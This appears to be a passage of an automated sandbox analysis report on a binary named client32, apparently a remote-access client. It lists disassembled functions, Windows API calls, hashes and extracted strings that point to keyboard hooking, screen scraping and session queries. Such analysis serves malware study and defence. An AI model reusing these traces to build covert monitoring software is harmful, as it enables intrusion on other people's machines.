                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                              • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                              • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                              • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                              • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                              • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                              • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                              • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                              • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                              • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                              • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                              • API String ID: 3874234733-2061581830
                                                                              • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                              • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                              Function 110AA170 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2078 110aa170-110aa1d2 LoadLibraryA GetProcAddress 2079 110aa1d8-110aa1e9 SetupDiGetClassDevsA 2078->2079 2080 110aa2e5-110aa2ed SetLastError 2078->2080 2081 110aa1ef-110aa1fd 2079->2081 2082 110aa3f3-110aa3f5 2079->2082 2085 110aa2f9-110aa2fb SetLastError 2080->2085 2086 110aa200-110aa204 2081->2086 2083 110aa3fe-110aa400 2082->2083 2084 110aa3f7-110aa3f8 FreeLibrary 2082->2084 2087 110aa417-110aa432 call 11162bb7 2083->2087 2084->2083 2088 110aa301-110aa30c GetLastError 2085->2088 2089 110aa21d-110aa235 2086->2089 2090 110aa206-110aa217 GetProcAddress 2086->2090 2091 110aa312-110aa31d call 11163aa5 2088->2091 2092 110aa3a0-110aa3b1 GetProcAddress 2088->2092 2089->2088 2101 110aa23b-110aa23d 2089->2101 2090->2085 2090->2089 2091->2086 2095 110aa3bb-110aa3bd SetLastError 2092->2095 2096 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 2092->2096 2100 110aa3c3-110aa3c5 2095->2100 2096->2100 2100->2082 2104 110aa3c7-110aa3e9 CreateFileA 2100->2104 2102 110aa248-110aa24a 2101->2102 2103 110aa23f-110aa245 call 11163aa5 2101->2103 2106 110aa24c-110aa25f GetProcAddress 2102->2106 2107 110aa265-110aa27b 2102->2107 2103->2102 2108 110aa3eb-110aa3f0 call 11163aa5 2104->2108 2109 110aa402-110aa40c call 11163aa5 2104->2109 2106->2107 2112 110aa322-110aa32a SetLastError 2106->2112 2117 110aa27d-110aa286 GetLastError 2107->2117 2118 110aa28c-110aa29f call 11163a11 2107->2118 2108->2082 2119 110aa40e-110aa40f FreeLibrary 2109->2119 2120 110aa415 2109->2120 2112->2117 2117->2118 2121 110aa361-110aa372 call 110aa110 2117->2121 2128 110aa382-110aa393 call 110aa110 2118->2128 2129 110aa2a5-110aa2ad 2118->2129 2119->2120 2120->2087 2126 110aa37b-110aa37d 2121->2126 2127 110aa374-110aa375 FreeLibrary 2121->2127 2126->2087 2127->2126 2128->2126 2136 110aa395-110aa39e FreeLibrary 2128->2136 2131 110aa2af-110aa2c2 GetProcAddress 2129->2131 2132 110aa2c4-110aa2db 2129->2132 2131->2132 2134 110aa32f-110aa331 SetLastError 2131->2134 2137 110aa337-110aa351 call 110aa110 call 11163aa5 2132->2137 2138 110aa2dd-110aa2e0 2132->2138 2134->2137 2136->2087 2137->2126 2143 110aa353-110aa35c FreeLibrary 2137->2143 2138->2086 2143->2087
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(setupapi.dll,EE49F673,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                              • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                              • _free.LIBCMT ref: 110AA240
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                              • GetLastError.KERNEL32 ref: 110AA27D
                                                                              • _malloc.LIBCMT ref: 110AA293
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                              • GetLastError.KERNEL32 ref: 110AA301
                                                                              • _free.LIBCMT ref: 110AA313
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                              • _free.LIBCMT ref: 110AA344
                                                                              • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                              • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                              • API String ID: 3464732724-3340099623
                                                                              • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                              • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                              Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2416 1102e199 2417 1102e1a0-1102e1b1 2416->2417 2417->2417 2418 1102e1b3 2417->2418 2419 1102e2f4-1102e30d call 11143690 2418->2419 2422 1102e313-1102e315 2419->2422 2423 1102e190-1102e193 2419->2423 2424 1102e413-1102e42d call 11146fe0 2422->2424 2425 1102e31b-1102e321 2422->2425 2426 1102e195-1102e197 2423->2426 2427 1102e1b8-1102e1c1 2423->2427 2450 1102e483-1102e48f call 1102bc40 2424->2450 2451 1102e42f-1102e448 call 1105e820 2424->2451 2430 1102e323-1102e332 call 11145990 2425->2430 2431 1102e338-1102e348 2425->2431 2426->2417 2427->2419 2428 1102e1c7-1102e1ce 2427->2428 2428->2419 2432 1102e2c3-1102e2d8 call 11163ca7 2428->2432 2433 1102e1d5-1102e1d7 2428->2433 2434 1102e2da-1102e2ef call 11163ca7 2428->2434 2435 1102e26a-1102e29d call 11162777 call 11142e60 2428->2435 2436 1102e2ab-1102e2c1 call 11164ed0 2428->2436 2437 1102e25b-1102e265 2428->2437 2438 1102e29f-1102e2a9 2428->2438 2439 1102e21c-1102e222 2428->2439 2440 1102e24c-1102e256 2428->2440 2430->2431 2441 1102e34a 2431->2441 2442 1102e34f-1102e36d call 1102d360 2431->2442 2432->2419 2433->2419 2453 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2433->2453 2434->2419 2435->2419 2436->2419 2437->2419 2438->2419 2454 1102e224-1102e238 call 11163ca7 2439->2454 2455 1102e23d-1102e247 2439->2455 2440->2419 2441->2442 2442->2424 2466 1102e373-1102e398 call 110b7df0 call 11147060 2442->2466 2475 1102e491-1102e498 2450->2475 2476 1102e468-1102e46f 2450->2476 2451->2450 2471 1102e44a-1102e45c 2451->2471 2453->2419 2454->2419 2455->2419 2500 1102e3a3-1102e3a9 2466->2500 2501 1102e39a-1102e3a1 2466->2501 2471->2450 2494 1102e45e 2471->2494 2477 1102e475-1102e478 2475->2477 2478 1102e49a-1102e4a4 2475->2478 2476->2477 2481 1102e67a-1102e69b GetComputerNameA 2476->2481 2484 1102e47a-1102e481 call 110b7df0 2477->2484 2485 1102e4a9 2477->2485 2478->2481 2488 1102e6d3-1102e6d9 2481->2488 2489 1102e69d-1102e6d1 call 11028230 2481->2489 2490 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2484->2490 2485->2490 2491 1102e6db-1102e6e0 2488->2491 2492 1102e70f-1102e722 call 11164ed0 2488->2492 2489->2488 2518 1102e727-1102e733 2489->2518 2549 1102e64a-1102e652 SetLastError 2490->2549 2550 1102e58c-1102e5a3 2490->2550 2497 1102e6e6-1102e6ea 2491->2497 2516 1102e917-1102e93a 2492->2516 2494->2476 2506 1102e706-1102e708 2497->2506 2507 1102e6ec-1102e6ee 2497->2507 2504 1102e3ab-1102e3b2 call 11028360 2500->2504 2505 1102e409 2500->2505 2501->2424 2504->2505 2525 1102e3b4-1102e3e6 2504->2525 2505->2424 2511 1102e70b-1102e70d 2506->2511 2514 1102e702-1102e704 2507->2514 2515 1102e6f0-1102e6f6 2507->2515 2511->2492 2511->2518 2514->2511 2515->2506 2520 1102e6f8-1102e700 2515->2520 2528 1102e962-1102e96a 2516->2528 2529 1102e93c-1102e942 2516->2529 2523 1102e735-1102e74a call 110b7df0 call 1102a1f0 2518->2523 2524 1102e74c-1102e75f call 11081d30 2518->2524 2520->2497 2520->2514 2556 1102e7a3-1102e7bc call 11081d30 2523->2556 2545 1102e761-1102e784 2524->2545 2546 1102e786-1102e788 2524->2546 2540 1102e3f0-1102e3ff call 110f64d0 2525->2540 2541 1102e3e8-1102e3ee 2525->2541 2534 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2528->2534 2535 1102e96c-1102e979 call 11036710 call 11162777 2528->2535 2529->2528 2532 1102e944-1102e95d call 1102d900 2529->2532 2532->2528 2535->2534 2553 1102e402-1102e404 call 1102d900 2540->2553 2541->2540 2541->2553 2545->2556 2547 1102e790-1102e7a1 2546->2547 2547->2547 2547->2556 2562 1102e613-1102e61f 2549->2562 2550->2562 2571 1102e5a5-1102e5ae 2550->2571 2553->2505 2577 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2556->2577 2578 1102e8fc-1102e909 call 11164ed0 2556->2578 2564 1102e662-1102e671 2562->2564 2565 1102e621-1102e62d 2562->2565 2564->2481 2574 1102e673-1102e674 FreeLibrary 2564->2574 2572 1102e63f-1102e643 2565->2572 2573 1102e62f-1102e63d GetProcAddress 2565->2573 2571->2562 2581 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2571->2581 2579 1102e654-1102e656 SetLastError 2572->2579 2580 1102e645-1102e648 2572->2580 2573->2572 2574->2481 2616 1102e853-1102e869 call 11129e00 2577->2616 2617 1102e83f-1102e84e call 11029a70 2577->2617 2594 1102e90c-1102e911 CharUpperA 2578->2594 2582 1102e65c 2579->2582 2580->2582 2581->2562 2601 1102e5e8-1102e60e call 11147060 call 11027f80 2581->2601 2582->2564 2594->2516 2601->2562 2621 1102e882-1102e8bc call 110d0e20 * 2 2616->2621 2622 1102e86b-1102e87d call 110d0e20 2616->2622 2617->2616 2629 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2621->2629 2630 1102e8be-1102e8cd call 11029a70 2621->2630 2622->2621 2629->2594 2630->2629
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: $134349$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 1029625771-2092513968
                                                                              • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                              • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                              Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2636 11142010-11142051 call 11147060 2639 11142057-111420b3 LoadLibraryA 2636->2639 2640 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2636->2640 2642 111420b5-111420c0 call 11017a40 2639->2642 2643 111420c7-111420d0 2639->2643 2652 11142105-1114210b 2640->2652 2653 11142133 2640->2653 2642->2643 2649 111420c2 call 110ccc90 2642->2649 2643->2640 2644 111420d2-111420d3 FreeLibrary 2643->2644 2644->2640 2649->2643 2652->2653 2655 1114210d-11142113 2652->2655 2654 1114213d-1114215d GetClassInfoExA 2653->2654 2656 11142163-1114218a call 11162be0 call 11145080 2654->2656 2657 111421fe-11142256 2654->2657 2655->2653 2658 11142115-11142131 call 1105e820 2655->2658 2667 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2656->2667 2668 1114218c-111421a0 call 11029a70 2656->2668 2669 11142292-11142298 2657->2669 2670 11142258-1114225e 2657->2670 2658->2654 2667->2657 2695 111421e7-111421fb call 11029a70 2667->2695 2668->2667 2674 111422d4-111422f6 call 1105e820 2669->2674 2675 1114229a-1114229f call 111101b0 2669->2675 2670->2669 2672 11142260-11142266 2670->2672 2672->2669 2678 11142268-1114227f call 1112d770 LoadLibraryA 2672->2678 2687 11142304-11142309 2674->2687 2688 111422f8-11142302 2674->2688 2684 111422a4-111422a9 2675->2684 2678->2669 2694 11142281-1114228d GetProcAddress 2678->2694 2685 111422cd 2684->2685 2686 111422ab-111422cb 2684->2686 2691 111422cf 2685->2691 2686->2691 2692 11142315-1114231b 2687->2692 2693 1114230b 2687->2693 2688->2692 2691->2674 2696 1114231d-11142323 call 110f8230 2692->2696 2697 11142328-11142341 call 1113d9a0 2692->2697 2693->2692 2694->2669 2695->2657 2696->2697 2704 11142347-1114234d 2697->2704 2705 111423e9-111423fa 2697->2705 2706 1114234f-11142361 call 111101b0 2704->2706 2707 11142389-1114238f 2704->2707 2717 11142363-11142379 call 1115e590 2706->2717 2718 1114237b 2706->2718 2709 111423b5-111423c1 2707->2709 2710 11142391-11142397 2707->2710 2711 111423c3-111423c9 2709->2711 2712 111423d8-111423e3 #17 LoadLibraryA 2709->2712 2714 1114239e-111423b0 SetTimer 2710->2714 2715 11142399 call 11135840 2710->2715 2711->2712 2716 111423cb-111423d1 2711->2716 2712->2705 2714->2709 2715->2714 2716->2712 2720 111423d3 call 1112e5e0 2716->2720 2722 1114237d-11142384 2717->2722 2718->2722 2720->2712 2722->2707
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                              • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                              • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                              • _memset.LIBCMT ref: 11142169
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                              • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                              • RegisterClassExA.USER32(?), ref: 111421DA
                                                                              • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                              • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                              • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                              • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,EE49F673,11030346,00000000), ref: 11017A6E
                                                                                • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                              • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                              • API String ID: 3706574701-3145203681
                                                                              • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                              • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                              Function 6EEF63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2725 6eef63c0-6eef6402 call 6ef14710 EnterCriticalSection InterlockedDecrement 2728 6eef65ed-6eef6608 LeaveCriticalSection call 6ef128e1 2725->2728 2729 6eef6408-6eef641f EnterCriticalSection 2725->2729 2731 6eef64da-6eef64e0 2729->2731 2732 6eef6425-6eef6431 2729->2732 2736 6eef65bd-6eef65e8 call 6ef11c50 LeaveCriticalSection 2731->2736 2737 6eef64e6-6eef64f0 shutdown 2731->2737 2734 6eef6443-6eef6447 2732->2734 2735 6eef6433-6eef6441 GetProcAddress 2732->2735 2739 6eef644e-6eef6450 SetLastError 2734->2739 2740 6eef6449-6eef644c 2734->2740 2735->2734 2736->2728 2741 6eef650a-6eef652d timeGetTime #16 2737->2741 2742 6eef64f2-6eef6507 GetLastError call 6eef30a0 2737->2742 2746 6eef6456-6eef6465 2739->2746 2740->2746 2743 6eef652f 2741->2743 2744 6eef656c-6eef656e 2741->2744 2742->2741 2749 6eef6551-6eef656a #16 2743->2749 2750 6eef6531 2743->2750 2751 6eef6570-6eef657b closesocket 2744->2751 2753 6eef6477-6eef647b 2746->2753 2754 6eef6467-6eef6475 GetProcAddress 2746->2754 2749->2743 2749->2744 2750->2749 2757 6eef6533-6eef653e GetLastError 2750->2757 2758 6eef657d-6eef658a WSAGetLastError 2751->2758 2759 6eef65b6 2751->2759 2755 6eef647d-6eef6480 2753->2755 2756 6eef6482-6eef6484 SetLastError 2753->2756 2754->2753 2760 6eef648a-6eef6499 2755->2760 2756->2760 2757->2744 2761 6eef6540-6eef6547 timeGetTime 2757->2761 2762 6eef658c-6eef658e Sleep 2758->2762 2763 6eef6594-6eef6598 2758->2763 2759->2736 2765 6eef64ab-6eef64af 2760->2765 2766 6eef649b-6eef64a9 GetProcAddress 2760->2766 2761->2744 2767 6eef6549-6eef654b Sleep 2761->2767 2762->2763 2763->2751 2768 6eef659a-6eef659c 2763->2768 2769 6eef64c3-6eef64d5 SetLastError 2765->2769 2770 6eef64b1-6eef64be 2765->2770 2766->2765 2767->2749 2768->2759 2771 6eef659e-6eef65b3 GetLastError call 6eef30a0 2768->2771 2769->2736 2770->2736 2771->2759
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,00000000,?,00000000,?,6EEFD77B,00000000), ref: 6EEF63E8
                                                                              • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6EEF63FA
                                                                              • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6412
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF643B
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6450
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6EEF646F
                                                                              • SetLastError.KERNEL32(00000078,?,00000000,?,6EEFD77B,00000000), ref: 6EEF6484
